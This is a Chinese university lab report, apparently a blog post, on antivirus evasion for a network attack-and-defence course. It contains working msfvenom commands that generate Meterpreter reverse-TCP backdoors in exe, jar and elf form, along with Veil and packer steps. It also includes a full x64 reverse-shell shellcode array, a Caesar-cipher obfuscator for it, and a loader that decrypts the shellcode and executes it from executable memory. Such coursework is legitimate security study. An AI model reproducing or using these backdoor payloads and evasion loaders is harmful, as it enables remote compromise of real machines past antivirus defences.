首页 > 其他分享 >20222318 2024-2025-1 《网络与系统攻防技术》实验三实验报告

20222318 2024-2025-1 《网络与系统攻防技术》实验三实验报告

时间:2024-10-31 22:48:17浏览次数:6  
标签:exe x41 x89 xff x48 2024 2025 20222318 x00

1.实验内容

1.1 问题回答

(1)杀软是如何检测出恶意代码的?

①基于特征码的检测:杀毒软件会维护一个包含各种已知恶意软件特征码的数据库。当扫描文件时,杀毒软件会将文件与数据库中的特征码进行比对,如果匹配,就会标记为恶意软件。

②启发式检测:启发式检测技术通过分析程序的行为模式来检测恶意行为,例如自我复制、修改、网络通信等,而不仅仅是依赖于特征码匹配。

③基于行为的检测:监控程序运行时的行为,检测其是否执行了可疑操作,如修改系统文件、访问敏感区域等。

④沙箱技术:沙箱技术在隔离的环境中运行可疑程序,防止其对系统造成实际伤害。

⑤机器学习:使用机器学习算法来识别恶意软件的模式,通过分析大量正常和恶意软件行为的样本,建立模型来预测未知的威胁。

(2)免杀是做什么?

免杀(Anti-Virus)技术,通常指的是一系列技术,这些技术可以使恶意软件(如病毒或木马)免于被杀毒软件检测和查杀。免杀技术的应用范围广泛,包括但不限于反会变、逆向工程、系统漏洞等技术领域。免杀技术的核心目标是在保证原文件功能正常的前提下,通过修改,使得原本会被查杀的文件免于被杀毒软件检测。

(3)免杀的基本方法有哪些?

①代码混淆:通过改变代码的结构、命名和控制流程,使得代码难以被静态分析和反汇编。

②加壳:使用加壳技术将恶意代码封装在另一个程序中,以隐藏真正的恶意功能,使其难以被安全软件检测到。

③行为免杀:改变恶意软件的行为模式,避免触发安全软件的行为监控。

④文件免杀:修改文件结构,加密恶意代码或使用代码混淆技术。

1.2 实验任务

(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

·下载veil工具,并使用它来生成恶意代码。

·使用C+shellcode编程。

·尝试upx压缩壳和试hyperion加密壳。

(2)通过组合应用各种技术实现恶意代码免杀

(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

2.实验过程

2.1 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

(一)使用msfvenom命令学习生成多种payload,通过VirScan检测

实验内容:使用msfvenom生成jar等文件。

注:本部分实验IP地址如下:
虚拟机:192.168.197.130
主机:192.168.135.6

查看 msfvenom 支持的所有输出格式:输入命令msfvenom --list formats

查看 msfvenom 支持的所有编码方式:输入命令msfvenom --list encoders

以下是通过对格式和编码方式的了解学习生成Payload。

(1)普通生成payload

输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.197.130 LPORT=8888 -f exe > 2318ex3-1.exe

-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型,是一个 Meterpreter 反向 TCP 连接;

LHOST=192.168.197.130:设置了反射回监听端的 IP 地址,即kali虚拟机的 IP 地址;

LPORT=8888:设置了连接回监听端的端口号;

-f exe:指定了输出格式为 Windows 可执行文件exe;

将2318ex3-1.exe通过Xftp传入主机,在 https://www.virscan.org/ 网站进行检测。

(2)使用编码器对payload进行一次编码:

输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.197.130 LPORT=8888 -f exe > 2318ex3-2.exe

-e x86/shikata_ga_nai: 这指定了要使用的编码器;

-b ‘\x00’: 这指定了需要避免的坏字符集;

检测结果:可以看到此时编码效果不显著。

(3)对payload进行多次编码:

输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.197.130 LPORT=8888 -f exe > 2318ex3-3.exe

-i 10表示编码10次;

检测结果:可以看到此时编码效果不显著。(甚至起反作用?)

(4)选择一个适用于Java环境的payload来生成jar文件:

输入命令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.197.130 LPORT=8888 -f jar > 2318ex3-4.jar

检测结果:可以看到jar包相较于exe文件免杀效果更好。

(5)对jar类型payload进行编码:

输入命令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.197.130 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f jar > 2318ex3-5.jar

检测结果:编码免杀效果仍不显著。

(6)生成一个适用于Linux环境的 Linux 可执行文件 elf:
输入命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.197.130 LPORT=8888 -f elf > 2318ex3-6.elf

检测结果:可以看到 elf 包相较于jar,exe文件免杀效果更好。

(7)对elf类型payload进行编码:
输入命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.197.130 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f elf > 2318ex3-7.elf

检测结果:对elf包进行编码有一定的免杀作用。

(二)使用veil工具生成

安装veil,需要保持虚拟机是联网状态,依次输入以下命令:

mkdir -p ~/.cache/wine

cd ~/.cache/wine

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

sudo apt-get install libncurses5*


(此时终端变白是因为虚拟机重装过了)(内存不够导致无法安装Veil)

sudo apt-get install libavutil55*

sudo apt-get install gcc-mingw-w64*

sudo apt-get install wine32

输入完sudo apt-get install wine32后报错,此时先输入dpkg --add-architecture i386,再输入sudo apt-get update,然后输入sudo apt-get install wine32即可。

注:下载任何东西的时候都可能还会报错说可以输入sudo apt-get update或者在install wine32的语句后加上--fix-missing选项补下载缺乏的软件包(如下图)

一般两个命令都输入后,再次输入sudo apt-get install 要下载的东西,就会显示如下图的“XX已经是最新版”,此时就表示下载完成了,不用理会其他提示信息。

如果还提示什么依赖关系,那就一个个用sudo apt-get install 缺乏的文件进行手动下载,比如下图就需要下载python3-pydot,python3-pygraphviz等。(提示:用鼠标选中某区域文字按右键可以复制粘贴,不要用Ctrl+c,Ctrl+v,虚拟机没有这个快捷键)下载完缺乏文件再下载一般wine或者veil就没有问题了。

总之历尽千辛万苦终于下载到了veil的下载器T T

在安装Veil之前,先进入Veil的配置文件修改他的下载网站(应该是原网址无效了)。

sudo su:切换为root用户登录。

cd /usr/share/veil/config/:进入Veil配置文件所在文件夹。

vim setup.sh:使用Vim编辑器修改安装文件。

在第260行左右找到图中红框一行(也可以用检索命令/sudo git clone),将网址改成https://gitee.com/spears/VeilDependencies.git(不要把后面的空格删掉,那是参数之间的空格表示间隔)

修改后是上图这样。

输入veil进行veil的正式安装!

注:如果说内存不够就重装虚拟机重新分配内存吧,如果直接扩展磁盘不会操作乱删数据其实也是毁了这个虚拟机......,如果又提示有什么东西依赖的缺的要apt-get update和--fix-missing的就照做,只能反反复复尝试。还有提示输入sudo /usr/share/veil/config/setup.sh --force --silent的,照做就行。

显示到这个界面就离成功很近了!只需要一直点Next~具体的流程在此:https://blog.csdn.net/Goodric/article/details/123806240

看到这个界面就代表Veil安装成功了!!!(洒泪)

输入use evasion,进入Veil—Evasion。

输入list,查看可使用的payload类型。

选用c/meterpretermrev_tcp.py,即7号,所以输入use 7

依次输入命令

set LHOST 192.168.197.143(此时虚拟机IP变成这个了)

set LPORT 8888

generate

把生成的文件命名为V20222318

在Veil生成Payload过程中提示生成的exe文件所在目录为/var/lib/veil/output/complied/V20222318.exe,故在此处找到exe文件传送到主机进行评估。

费半天劲生成的Payload免杀效果也不好啊。/捂脸苦笑

(三)使用C+shellcode编程

输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.139 LPORT=8888 -f c来获取一段C语言shellcode编码。

输入vi 2318ex3-8.c,创建文件并将shellcode加入进去。

并加入main函数作为启动起点。

编辑完毕将C文件传至主机进行编译得到exe,拿去测试。

(搞错了,C文件是查不出来的)

(四)尝试upx压缩壳和试hyperion加密壳。

输入指令upx 2318ex3-1.exe -o 2318ex3-1_upx.exe,对后门文件进行压缩加壳,生成文件2318ex3-1_upx.exe.

将原文件以及加壳文件复制到hyperion所在目录下,用wine和hyperion进行加密壳处理。

将两个文件传输到主机进行评估。

明明加壳了更容易被杀好不好()

2.2 通过组合应用各种技术实现恶意代码免杀

kali虚拟机中通过msfvenom生成Shellcode字符串数组
输入指令msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.197.143 LPORT=8888 -f c

将buf[]中的内容复制,新建20222316lzf-decode.c文件,输入自己写的代码,代码功能为将复制内容放入shellcode[]数组中,通过代码将shellcode进行凯撒加密,将密文输入到20222318lzf.txt文件中

代码如下:

点击查看代码
#include <stdio.h>
#include <stdlib.h>

void caesarEncrypt(unsigned char *data, size_t length, int shift_Num) {
	for (size_t i = 0; i < length; i++) {
		data[i]= (data[i] + shift_Num) & 0xFF;
	}
}

int main()
{
    unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x51"
"\x56\x48\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48"
"\x8b\x72\x50\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b"
"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x41\x51\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88"
"\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
"\x89\xe5\x49\xbc\x02\x00\x22\xb8\xc0\xa8\xc5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
"\xf0\xb5\xa2\x56\xff\xd5";

    int shift_Num =3;
	printf("original: ");
	for (size_t i = 0; i < 510; i++) {
		printf("\\x%02x",shellcode[i]);
	}
	printf("\n");
	caesarEncrypt(shellcode,510,shift_Num);
	printf("Encrypted:");
	for (size_t i =0;i< 510; i++){
		printf("\\x%02x",shellcode[i]);
	}
	printf("\n");
	FILE *file = fopen("20222318lzf.txt", "w");
	if (file != NULL) {
	    for (size_t i = 0; i < 510; i++) {
	        fprintf(file, "\\x%02x", shellcode[i]);
	    }
	    fprintf(file, "\n");
	    fclose(file);
	}
	else {
		printf("Error opening file!\n");
	}
	return 0;

}

再新建20222318lzf-decode.cpp文件,编写一个解密代码,代码功能为读取20222318lzf.txt文件中的内容到shellcode[]数组中,并进行解密,再运行shellcode;

代码如下:

点击查看代码
ude <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void caesarDecrypt(unsigned char *data, size_t length, int shift) {
    for (size_t i = 0; i < length; i++) {
        data[i] = (unsigned char)((data[i] - shift + 256) % 256);
    }
}

int main() {
    int shift = 3;
    unsigned char shellcode1[511];
    char line[1024];
    FILE *file = fopen("20222318lzf.txt", "r");
    if (file == NULL) {
        perror("Error opening file");
        return 1;
    }
    size_t length = 0;
    while (fgets(line, sizeof(line), file)) {
        for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {
            if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {
                length++;
            }
        }
    }
    fclose(file);
    caesarDecrypt(shellcode1, length, shift);
    LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode1, sizeof shellcode1);
    ((void(*)())exec)();
    return 0;
}

将C文件放在桌面上进行编译得到 exe 文件,试图在打开Windows Defender的情况运行,实际情况:

被删除啦!!T T还是太嫩了!免杀失败

2.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

在本机都过不了,这个任务不了了之。。。

3.问题及解决方案

  • 问题与解决方案均在实验过程中写出。(在下载wine的时候AI说使用aptitude这个下载软件包能解决依赖关系,后来发现他只是无视依赖关系进行下载,还会卸载掉我已经一个个手动下载的文件,遂含泪放弃该方案)

4.学习感悟、思考等

这次实验真的是花了很长很长时间去下wine32和Vile,反反复复去下载缺失的软件包,又由于某些神秘的依赖关系导致总是无法下载,校园网又慢,下载的过程只能等待,整个实验感觉十分被动。切换成热点后一天怒用14G流量,还要反反复复重装虚拟机下载各种软件包,做起来真的很心力交瘁。我们这次实验所下载的这些免杀工具可能都是很早以前的工具了,那个时候杀毒软件还不够强力,可能还比较好用,现在我们如果只想借用工具而不靠自己精进专业知识,想突破杀毒软件的防线真的是痴人说梦。网络攻防真的是一个道高一尺魔高一丈的过程,想要学好真的需要一辈子都在学习前沿知识,难啊!我们真的需要不断地学习和掌握新的安全技术,提高自己的安全意识和防护能力。

标签:exe,x41,x89,xff,x48,2024,2025,20222318,x00
From: https://www.cnblogs.com/Keitaro726/p/18518843

相关文章

  • 20222319 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容1.1实验目的(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil,加壳工具使用C+shellcode编程(2)通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的,简单语言描述原理,......
  • 20222409 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容1.1本周学习内容1.1.1后门工具使用*Netcat:用于端口探测、局域网通信、文件传输,以及正向和反向连接的测试。*Meterpreter:作为Metasploit框架中的载荷模块,常用于溢出攻击成功后的控制会话,提供持久化的控制通道。*Veil-Evasion:Linux平台上的免杀工具,用于生......
  • 论文速读记录 - 202410
    坚持看论文不容易啊,十月也是多事之秋。看的论文有点少,也有点散,还是要专注一些具体的方向,梳理脉络,整理方案,才是看论文找解决方案的正确思路。以后的每篇论文解读的后面,会附带一点个人看法/评论,如有冒犯还请见谅。目录:LATECHUNKING:CONTEXTUALCHUNKEMBEDDINGSUSINGLONG-C......
  • 2024.10.31 近期练习
    板刷ARC,再不刷就退役了。ARC185AmodMGame2猜结论题,两个人牌的总和是\(n\times(n+1)\)。若\(n\times(n+1)\bmodm=0\)或\(>n\)先手获胜。显然手牌还有大于\(1\)张的时候不可能失败。和取模\(m\)为\(0\)那么后手一定最后一张失败;若取模\(\len\)则后手一直......
  • 2024.10.31
    《代码大全2》是一本编程领域的经典之作,为开发者们提供了丰富且实用的指导。在阅读过程中,关于软件构建的前期准备给我留下了深刻印象。书中强调了需求分析的重要性,这就像是大厦的蓝图绘制。如果对需求理解不清晰或存在偏差,后续的代码编写可能会像没有方向的航行。例如,若开发一个......
  • 2024.10.31..
    《代码大全2》是一部编程领域的瑰宝,为编程者打开了一扇通向高质量代码世界的大门。阅读此书,深刻感受到它对于编程全方位的指导意义。从前期的规划设计到具体的代码编写,再到后期的调试优化,无一遗漏。在设计阶段,它教会我们如何准确把握需求,制定合理架构,避免盲目编码。编写代码过程......
  • 2024.10.31.
    《程序员修炼之道》为程序员们呈现了一条从入门到精通的成长路径,宛如一幅指引前行的地图。书中提到的“注重实效的哲学”让我深思。它强调要以一种务实的态度对待编程,明白每个代码决策背后的价值。例如,在选择算法时,不能仅仅因为某个算法新或者复杂就选用,而要根据实际的业务场景......
  • 2024/10/31
    十月的最后一天。CCO2020ExerciseDeadlines交换次数等于逆序对数量,所以我们的目标就是最小化逆序对数量。考虑一个贪心,每次将尽可能大的数放在最后面。用线段树/树状数组来维护即可。「雅礼集训2017Day4」洗衣服有一个做法是分别处理洗完每件衣服的最少时间\(a_i\),和烘......
  • 20222402 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容本周学习免杀:英文为Anti-AntiVirus(简写VirusAV),逐字翻译为“反·反病毒”,翻译为“反杀毒技术”。一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。杀毒软件原理。免杀处理:对生成的恶意代码进行免杀处理,加壳。测试与验证:将处理......
  • 20222404张嘉月 2024-2025-1 《网络与系统攻防》实验三实验报告
    1.实验内容(一)本周所学恶意代码的简介、类别、代表性的恶意代码介绍,包括僵尸程序、后门攻击、蠕虫等等。历史上的恶意代码历史发展和所造成的影响与影响范围。介绍恶意代码的分析技术(静态、动态)(二)实验要求(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技......